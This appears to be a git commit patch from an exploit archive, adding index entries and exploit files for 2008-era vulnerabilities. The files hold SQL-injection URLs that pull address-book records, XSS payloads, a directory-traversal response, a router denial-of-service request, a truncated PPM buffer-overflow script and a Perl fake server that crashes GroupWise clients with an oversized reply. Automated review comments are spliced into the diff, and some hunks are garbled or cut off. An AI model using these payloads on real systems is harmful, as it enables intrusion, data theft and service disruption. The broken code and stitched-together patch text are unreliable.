From 2928ba603e0c234a7cad95a4614c98d50e2600f6 Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Wed, 26 Feb 2014 04:27:36 +0000
Subject: [PATCH] Updated 02_26_2014

---
 files.csv | 20 ++++
 platforms/asp/webapps/31891.txt | 9 ++
 platforms/cgi/webapps/31892.txt | 9 ++
 platforms/hardware/dos/31884.txt | 9 ++
 platforms/hardware/remote/31885.txt | 9 ++
 platforms/hardware/remote/31886.txt | 9 ++
 platforms/linux/remote/31887.txt | 14 +++
 platforms/multiple/dos/31872.py | 50 ++++++++++
 platforms/multiple/remote/31890.txt | 9 ++
 platforms/novell/dos/31889.pl | 142 ++++++++++++++++++++++++++++
 platforms/php/webapps/31880.txt | 9 ++
 platforms/php/webapps/31881.txt | 9 ++
 platforms/php/webapps/31882.txt | 9 ++
 platforms/php/webapps/31883.txt | 12 +++
 platforms/php/webapps/31888.txt | 13 +++
 platforms/php/webapps/31893.txt | 7 ++
 platforms/windows/dos/31876.xml | 14 +++
 platforms/windows/dos/31877.xml | 11 +++
 platforms/windows/dos/31878.xml | 11 +++
 platforms/windows/dos/31879.xml | 9 ++
 platforms/windows/remote/31873.xml | 11 +++
 21 files changed, 395 insertions(+)
 create mode 100755 platforms/asp/webapps/31891.txt
 create mode 100755 platforms/cgi/webapps/31892.txt
 create mode 100755 platforms/hardware/dos/31884.txt
 create mode 100755 platforms/hardware/remote/31885.txt
 create mode 100755 platforms/hardware/remote/31886.txt
 create mode 100755 platforms/linux/remote/31887.txt
 create mode 100755 platforms/multiple/dos/31872.py
 create mode 100755 platforms/multiple/remote/31890.txt
 create mode 100755 platforms/novell/dos/31889.pl
 create mode 100755 platforms/php/webapps/31880.txt
 create mode 100755 platforms/php/webapps/31881.txt
 create mode 100755 platforms/php/webapps/31882.txt
 create mode 100755 platforms/php/webapps/31883.txt
 create mode 100755 platforms/php/webapps/31888.txt
 create mode 100755 platforms/php/webapps/31893.txt
 create mode 100755 platforms/windows/dos/31876.xml
 create mode 100755 platforms/windows/dos/31877.xml
 create mode 100755 platforms/windows/dos/31878.xml
 create mode 100755 platforms/windows/dos/31879.xml
 create mode 100755 platforms/windows/remote/31873.xml

diff --git a/files.csv b/files.csv
index 9e839ef95..45a41f23a 100755
--- a/files.csv
+++ b/files.csv
@@ -28661,3 +28661,23 @@ id,file,description,date,author,platform,type,port
 31869,platforms/asp/webapps/31869.txt,"i-pos Storefront 1.3 'index.asp' SQL Injection Vulnerability",2008-06-02,KnocKout,asp,webapps,0
 31870,platforms/php/webapps/31870.pl,"Joomla! and Mambo Joo!BB 0.5.9 Component 'forum' Parameter SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0
 31871,platforms/asp/webapps/31871.txt,"Te Ecard 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0
+31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 PNM File Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0
+31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0
+31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
+31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0
+31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
+31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
+31880,platforms/php/webapps/31880.txt,"WyMIEN PHP 1.0 'index.php' Cross Site Scripting Vulnerability",2008-06-04,ZoRLu,php,webapps,0
+31881,platforms/php/webapps/31881.txt,"PHP Address Book 3.1.5 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0
+31882,platforms/php/webapps/31882.txt,"SamTodo 1.1 'tid' Parameter Cross Site Scripting Vulnerability",2008-06-05,"David Sopas Ferreira",php,webapps,0
+31883,platforms/php/webapps/31883.txt,"SamTodo 1.1 'completed' Parameter Cross Site Scripting Vulnerability",2008-06-05,"David Sopas Ferreira",php,webapps,0
+31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router Malformed HTTP Request Denial of Service Vulnerability",2008-06-05,dubingyao,hardware,dos,0
+31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 /vdesk/admincon/webyfiers.php css_exceptions Parameter XSS",2008-06-05,nnposter,hardware,remote,0
+31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 /vdesk/admincon/index.php sql_matchscope Parameter XSS",2008-06-05,nnposter,hardware,remote,0
+31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 'LIST' Command Directory Traversal Vulnerability",2008-06-06,"Tan Chew Keong",linux,remote,0
+31888,platforms/php/webapps/31888.txt,"SchoolCenter 7.5 Multiple Cross Site Scripting Vulnerabilities",2008-06-06,Doz,php,webapps,0
+31889,platforms/novell/dos/31889.pl,"Novell GroupWise Messenger 2.0 Client Buffer Overflow Vulnerabilities",2008-07-02,"Francisco Amato",novell,dos,0
+31890,platforms/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature HTML Injection and Information Disclosure Vulnerabilities",2008-06-20,"Ferruh Mavituna",multiple,remote,0
+31891,platforms/asp/webapps/31891.txt,"Real Estate Website 1.0 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,asp,webapps,0
+31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 'p' Parameter Cross Site Scripting Vulnerability",2008-06-10,Unohope,cgi,webapps,0
+31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP Multiple Cross Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0
diff --git a/platforms/asp/webapps/31891.txt b/platforms/asp/webapps/31891.txt
new file mode 100755
index 000000000..b810f3620
--- /dev/null
+++ b/platforms/asp/webapps/31891.txt
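Review bot: Several of the new index rows disagree with the advisory text committed alongside them, so searches over files.csv will return versions and issue types the files themselves do not state. Row 31884 gives firmware `1.1.3` while platforms/hardware/dos/31884.txt says `1.01.03`; rows 31873 and 31876–31879 give HP Instant Support `1.0.22` while each of those .xml bodies says `1.0.0.22`; row 31880 says `WyMIEN PHP 1.0` where the file says `1.0RC2`. Rows 31885 and 31886 are titled as parameter XSS, but both text files describe the issue as cross-site request-forgery; the PoC URLs in those files are reflected-script payloads, so the file text is the more likely error, but the two should be reconciled either way. The description column should follow whatever the indexed file states, e.g. `31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.01.03 Wireless-G Router Malformed HTTP Request Denial of Service Vulnerability",...`. The diffstat also lists platforms/multiple/remote/31890.txt, but no hunk for it appears in this rendering, which may be an artifact of the page rather than the commit.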
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29612/info
+
+Real Estate Website is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Real Estate Website 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/PATH/location.asp?name="> http://www.example.com/PATH/location.asp?name=JosS&location=IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00
\ No newline at end of file
diff --git a/platforms/cgi/webapps/31892.txt b/platforms/cgi/webapps/31892.txt
new file mode 100755
index 000000000..a1c906b3b
--- /dev/null
+++ b/platforms/cgi/webapps/31892.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29626/info
+
+Tornado Knowledge Retrieval System is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Tornado Knowledge Retrieval System 4.2 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/tornado/searcher.exe?v=root&p=
\ No newline at end of file
diff --git a/platforms/hardware/dos/31884.txt b/platforms/hardware/dos/31884.txt
new file mode 100755
index 000000000..f8b92b4db
--- /dev/null
+++ b/platforms/hardware/dos/31884.txt
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29570/info + +Linksys WRH54G Wireless-G Router is prone to a denial-of-service vulnerability because it fails to adequately handle malformed HTTP requests. As a result, memory becomes corrupted and the device's HTTP service will crash. + +Successful exploits will deny service to legitimate users. Given the nature of this issue, remote code execution may be possible, but this has not been confirmed. + +WRH54G firmware version 1.01.03 is vulnerable; other versions may also be affected. + +http://192.168.1.106/./front_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_p
agefront_pagefront_pagefront_pagefront_page.asp
\ No newline at end of file
diff --git a/platforms/hardware/remote/31885.txt b/platforms/hardware/remote/31885.txt
new file mode 100755
index 000000000..a8b2ee63d
--- /dev/null
+++ b/platforms/hardware/remote/31885.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29574/info
+
+F5 FirePass SSL VPN is prone to multiple cross-site request-forgery vulnerabilities because it fails to adequately sanitize user-supplied input.
+
+Exploiting these issues may allow a remote attacker to execute arbitrary actions in the context of the affected application.
+
+FirePass 6.0.2 hotfix 3 is vulnerable; other versions may also be affected.
+
+https://www.example.com/vdesk/admincon/webyfiers.php?a=css&click=1&css_exceptions=%22+onfocus%3Dalert%28%26quot%3BXSS1%26quot%3B%29+foo%3D%22&save_css_exceptions=Update
\ No newline at end of file
diff --git a/platforms/hardware/remote/31886.txt b/platforms/hardware/remote/31886.txt
new file mode 100755
index 000000000..b0d6a48d5
--- /dev/null
+++ b/platforms/hardware/remote/31886.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29574/info
+
+F5 FirePass SSL VPN is prone to multiple cross-site request-forgery vulnerabilities because it fails to adequately sanitize user-supplied input.
+
+Exploiting these issues may allow a remote attacker to execute arbitrary actions in the context of the affected application.
+
+FirePass 6.0.2 hotfix 3 is vulnerable; other versions may also be affected.
+
+https://www.example.com/vdesk/admincon/index.php?a=css&sub=sql&sql_matchscope=%22+onfocus%3Dalert%28%26quot%3BXSS2%26quot%3B%29+foo%3D%22&save_sql_matchscope=Update
\ No newline at end of file
diff --git a/platforms/linux/remote/31887.txt b/platforms/linux/remote/31887.txt
new file mode 100755
index 000000000..cb333be61
--- /dev/null
+++ b/platforms/linux/remote/31887.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/29585/info
+
+ALFTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP client.
+
+Exploiting this issue will allow an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
+
+ALFTP 4.1 beta 2 (English) and 5.0 (Korean) are vulnerable; other versions may also be affected.
+
+Response to LIST (backslash):
+
+\..\..\..\..\..\..\..\..\..\testfile.txt\r\n
+
+Response to LIST (forward-slash):
+/../../../../../../../../../testfile.txt\r\n
\ No newline at end of file
diff --git a/platforms/multiple/dos/31872.py b/platforms/multiple/dos/31872.py
new file mode 100755
index 000000000..7df7af5ae
--- /dev/null
+++ b/platforms/multiple/dos/31872.py
@@ -0,0 +1,50 @@ +source: http://www.securityfocus.com/bid/29517/info + +NASA Ames Research Center BigView is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. + +An attacker can exploit this issue to execute arbitrary code in the context of the application. Successful attacks will compromise the application and underlying computer. Failed exploit attempts will result in a denial of service. + +BigView 1.8 is vulnerable; other versions may also be affected. + +/----------- + +## BigView exploit +## Alfredo Ortega - Core Security Exploit Writers Team (EWT) +## Works against BigView "browse" revision 1.8 compiled on ubuntu 6.06 +Desktop i386 + +import struct +w = open("crash.ppm","wb") +w.write("""P3 +#CREATOR: The GIMP's PNM Filter Version +1.0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""") +# This exploit is not trivial, because the function PPM::ppmHeader() +doesn't return inmmediately, and we must modify internal variables to +cause an overwrite of a C++ string destructor executed at the end of the +function to gain control of EIP +# PS.: Congrats for the Phoenix mars Lander! +for i in range(7): + w.write(chr(i)*4) +w.write("AA") +w.write(struct.pack(" \ No newline at end of file diff --git a/platforms/novell/dos/31889.pl b/platforms/novell/dos/31889.pl new file mode 100755 index 000000000..a0d5481d5 --- /dev/null +++ b/platforms/novell/dos/31889.pl 
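Review bot: The committed 31872.py is not valid Python as stored: the advisory prose on its first lines and the continuation lines of the wrapped comment (`doesn't return inmmediately, ...`, `cause an overwrite ...`, `function to gain control of EIP`) carry no `#` prefix, so the interpreter would stop at them before reaching the PNM writer. The hunk header also announces 50 lines while the visible content stops mid-call at `w.write(struct.pack("`; whether the archived file or only this rendering is truncated cannot be told from here, so the stored file should be checked against that count. A header comment such as `# Archived PoC reproduced from the published advisory text; kept as-is, not maintained` would tell readers what to expect from the file.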
@@ -0,0 +1,142 @@
+source: http://www.securityfocus.com/bid/29602/info
+
+Novell GroupWise Messenger is prone to two buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized buffer.
+
+Attackers can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+Versions prior to Novell GroupWise Messenger 2.0.3 HP1 are vulnerable.
+
+#!/usr/bin/perl -w
+
+##
+#Simple fake groupwise msn server.
+#Date: 07/02/2008
+#[ISR] - www.infobyte.com.ar
+#Author: Francisco Amato
+##
+
+use strict;
+use IO::Socket;
+use Data::Dump qw(dump);
+
+my $port=8300;
+my $conn="HTTP/1.0 200 \r\nDate: Sat, 12 Jan 2008 01:28:59 GMT\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n\n\0\20\0\0\0nnmFileTransfer\0\2\0\0\x000\0\n\0\t\0\0\0nnmQuery\0\2\0\0\x001\0\n\0\13\0\0\0nnmArchive\0\2\0\0\x001\0\n\0\24\0\0\0nnmPasswordRemember\0\2\0\0\x001\0\n\0\17\0\0\0nnmMaxContacts\0\4\0\0\x00150\0\n\0\16\0\0\0nnmMaxFolders\0\3\0\0\x0050\0\n\0\r\0\0\0nnmBroadcast\0\2\0\0\x001\0\n\0\23\0\0\0nnmPersonalHistory\0\2\0\0\x001\0\n\0\r\0\0\0nnmPrintSave\0\2\0\0\x001\0\n\0\17\0\0\0nnmChatService\0\2\0\0\x001\0\n\0\3\0\0\0CN\0\a\0\0\0ISR000\0\n\0\b\0\0\0Surname\0\6\0\0\0Amato\0\n\0\n\0\0\0Full Name\0\20\0\0\0Client Name \0\n\0\13\0\0\0Given Name\0\n\0\0\0Client \0\n\0\r\0\0\0nnmLastLogin\0\13\0\0\x001200112090\0\t\0\30\0\0\0NM_A_FA_CLIENT_SETTINGS\0\1\0\0\0\n\0\21\0\0\0Novell.AskToSave\0\2\0\0\x001\0\t\0\e\0\0\0NM_A_FA_INFO_DISPLAY_ARRAY\0\1\0\0\0\n\0\27\0\0\0Internet EMail Address\0\26\0\0\0xxxxx\@xxxxxxxx.com.xx\0\b\0\16\0\0\0NM_A_UD_BUILD\0\a\0\0\0\n\0\13\0\0\0NM_A_SZ_DN\x001\0\0\0CN=ISR000,OU=IT,OU=ISR_,OU=BA,OU=AR,O=INFOBYTEXX\0\t\0\24\0\0\0NM_A_FA_AU_SETTINGS\0\1\0\0\0\n\0\22\0\0\0nnmClientDownload\0\2\0\0\x000\0\b\0\22\0\0\0NM_A_UD_KEEPALIVE\0\n\0\0\0\n\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0\n\0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0";
+my $resp="HTTP/1.0 200 \r\nDate: Fri, 04 Jan 2008 09:55:40 GMT\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n\n\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0\n\0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x00c0d3\0\0";
+my $crash="A"x5000;
+#initial
+&main;
+
+##########################################################################
+# FUNCTION main
+# RECEIVES
+# RETURNS
+# EXPECTS
+# DOES application's startup
+sub main {
+
+ #ignore child's process
+ $SIG{CHLD} = 'IGNORE';
+
+ my $listen_socket = IO::Socket::INET->new(LocalPort => $port,
+ Listen => 10,
+ Proto => 'tcp',
+ Reuse => 1);
+
+ die "Cant't create a listening socket: $@" unless $listen_socket;
+
+ print "[ISR] www.infobyte.com.ar - Francisco Amato\n";
+ print "[Groupwise Messager] Fake Server ready. Waiting for connections ... \n";
+
+ #esperar conexiones
+ while (my $connection = $listen_socket->accept){
+
+ my $child;
+ # crear el fork para salir
+ die "Can't fork: $!" unless defined ($child = fork());
+
+ #child
+ if ($child == 0){
+
+ #close socket
+ $listen_socket->close;
+
+ #process request
+ &client($connection);
+
+ exit 0;
+ }
+ #father
+ else{
+
+ warn "Connecton recieved ... ",$connection->peerhost,"\n";
+
+ #close connection
+ $connection->close();
+
+ }
+ }
+}
+##########################################################################
+# FUNCTION client
+# RECEIVES
+# RETURNS
+# EXPECTS
+# DOES process client request
+sub client{
+
+ my ($socket) = @_;
+ my $st=2; #initial code
+
+ $|=1;
+
+ my $rp;
+ my $data = <$socket>;
+ pdata($data);
+ if ($data =~ /POST \/login/){
+ $data = <$socket>;
+ pdata($data);
+ $data = <$socket>;
+ pdata($data);
+ $data = <$socket>;
+ pdata($data);
+ printf $socket $conn;
+ pdata($conn,1);
+ while ($data = <$socket>){ #commands
+ if ($data =~ /POST \/setstatus/){
+
+ pdata($data);
+ $data = <$socket>;
+ pdata($data);
+ $data = <$socket>;
+ pdata($data);
+
+ $rp=$resp;
+ $rp =~ s/c0d3/$st/g;
+ $rp .=$crash;
+ printf $socket $rp;
+ pdata($rp,1);
+ $st++;
+
+ }else{
+ pdata("ELSE -". $data);
+ }
+ }
+ }
+ close($socket);
+
+}
+##########################################################################
+# FUNCTION pdata
+# RECEIVES
+# RETURNS
+# EXPECTS
+# DOES debug information
+sub pdata {
+ my ($data,$orden) =@_;
+ if ($orden){
+ print "[SERVER] - ";
+ }else{
+ print "[CLIENT] - ";
+ }
+ print dump($data) . "\n";
+}
diff --git a/platforms/php/webapps/31880.txt b/platforms/php/webapps/31880.txt
new file mode 100755
index 000000000..036160b76
--- /dev/null
+++ b/platforms/php/webapps/31880.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29551/info
+
+WyMIEN PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+WyMIEN PHP 1.0RC2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/WyMienphp1.0-RC2/WyMienphp/index.php?f=[XSS]
\ No newline at end of file
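Review bot: The three `# FUNCTION` header blocks (`main`, `client`, `pdata`) leave their `RECEIVES`, `RETURNS` and `EXPECTS` fields empty, so the template documents nothing beyond the one-line `DOES`. From the code they can be filled in: `client` receives the accepted `IO::Socket::INET` connection in `$socket` and returns nothing after `close($socket)`; `pdata` receives `$data` (the scalar it dumps) and `$orden`, which when true labels the line `[SERVER]` and otherwise `[CLIENT]`, e.g. `# RECEIVES $data - value to dump; $orden - true for data sent by this server`. The body comments also mix Spanish (`#esperar conexiones`, `# crear el fork para salir`) with English; the English equivalents `#wait for connections` and `# fork so the child handles the request` keep the file consistent.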
diff --git a/platforms/php/webapps/31881.txt b/platforms/php/webapps/31881.txt
new file mode 100755
index 000000000..994149009
--- /dev/null
+++ b/platforms/php/webapps/31881.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29560/info
+
+PHP Address Book is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP-Address Book 3.1.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/view.php?id=-1 union select 1,2,3,id,firstname,lastname,7,address,mobile,10,11,12,email,14 from addressbook/* http://www.example.com/edit.php?id=-1 union select 1,2,3,id,firstname,lastname,7,address,mobile,10,11,12,email,14 from addressbook/* http://www.example.com/?group= http://www.example.com/index.php?group=
\ No newline at end of file
diff --git a/platforms/php/webapps/31882.txt b/platforms/php/webapps/31882.txt
new file mode 100755
index 000000000..0bd9be4f4
--- /dev/null
+++ b/platforms/php/webapps/31882.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29568/info
+
+SamTodo is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SamTodo 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?go=main.taskeditor&tid=f29de7fa-6625-4e20-8a19-11c0f4d799f6[XSS]&mode=edit
\ No newline at end of file
diff --git a/platforms/php/webapps/31883.txt b/platforms/php/webapps/31883.txt
new file mode 100755
index 000000000..a548f8284
--- /dev/null
+++ b/platforms/php/webapps/31883.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/29569/info
+
+SamTodo is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SamTodo 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?go=main.default&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E
+
+http://www.example.com/index.php?go=main.default&orderBy=taskComplete&ascDesc=DESC&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E
+
diff --git a/platforms/php/webapps/31888.txt b/platforms/php/webapps/31888.txt
new file mode 100755
index 000000000..310e59353
--- /dev/null
+++ b/platforms/php/webapps/31888.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/29591/info
+
+SchoolCenter is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/education/components/docmgr/default.php?sectiondetailid=2179&fileitem=477&catfilter=XSS
+http://www.example.com/education/components/docmgr/default.php?sectiondetailid=#XSS
+http://www.example.com/education/components/scrapbook/default.php?sectiondetailid=#XSS
+http://www.example.com/education/district/district.php?sectiondetailid=#XSS
+http://www.example.com/education/admin/XSS
+http://www.example.com/education/components/XSS
+http://www.example.com/education/components/whatsnew/default.php?sectiondetailid=#XSS
\ No newline at end of file
diff --git a/platforms/php/webapps/31893.txt b/platforms/php/webapps/31893.txt
new file mode 100755
index 000000000..ba49bb4eb
--- /dev/null
+++ b/platforms/php/webapps/31893.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29632/info
+
+Hot Links SQL-PHP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/path/search.php?search=[XSS] http://www.example.com/path/search.php?search='> http://www.example.com/path/report.php?id=[XSS] http://www.example.com/path/report.php?id='> http://www.example.com/path/reviews.php?action=review&id==[XSS] http://www.example.com/path/reviews.php?action=review&id='> http://www.example.com/path/reviews.php?action=rate&id=[XSS] http://www.example.com/path/reviews.php?action=rate&id='>
\ No newline at end of file
diff --git a/platforms/windows/dos/31876.xml b/platforms/windows/dos/31876.xml
new file mode 100755
index 000000000..67a07280a
--- /dev/null
+++ b/platforms/windows/dos/31876.xml
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/29533/info
+
+
+HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to an insecure-method vulnerability.
+
+Successfully exploiting this issue allows remote attackers to launch arbitrary applications with the privileges of the application running the ActiveX control (typically Internet Explorer).
+
+Note that if the attacker could place a malicious executable on the system, they would be able to launch it using this vulnerability.
+
+HP Instant Support 1.0.0.22 and earlier versions are affected.
+
+NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.
+
+
\ No newline at end of file
diff --git a/platforms/windows/dos/31877.xml b/platforms/windows/dos/31877.xml
new file mode 100755
index 000000000..2a689b2d8
--- /dev/null
+++ b/platforms/windows/dos/31877.xml
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29534/info
+
+HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary code in the context of an application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
+
+HP Instant Support 1.0.0.22 and earlier versions are affected.
+
+NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.
+
+
\ No newline at end of file
diff --git a/platforms/windows/dos/31878.xml b/platforms/windows/dos/31878.xml
new file mode 100755
index 000000000..5fe898cbf
--- /dev/null
+++ b/platforms/windows/dos/31878.xml
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29535/info
+
+HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a vulnerability that lets attackers create and overwrite files with arbitrary, attacker-controlled content.
+
+Successful exploits may compromise affected computers and aid in further attacks.
+
+HP Instant Support 1.0.0.22 and earlier versions are affected.
+
+NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.
+
+
\ No newline at end of file
diff --git a/platforms/windows/dos/31879.xml b/platforms/windows/dos/31879.xml
new file mode 100755
index 000000000..37760b1db
--- /dev/null
+++ b/platforms/windows/dos/31879.xml
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29536/info
+
+HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a vulnerability that lets attackers delete arbitrary files on the affected computer in the context of the application using the ActiveX control. Successful attacks can result in denial-of-service conditions.
+
+HP Instant Support 1.0.0.22 and earlier versions are affected.
+
+NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.
+
+
\ No newline at end of file
diff --git a/platforms/windows/remote/31873.xml b/platforms/windows/remote/31873.xml
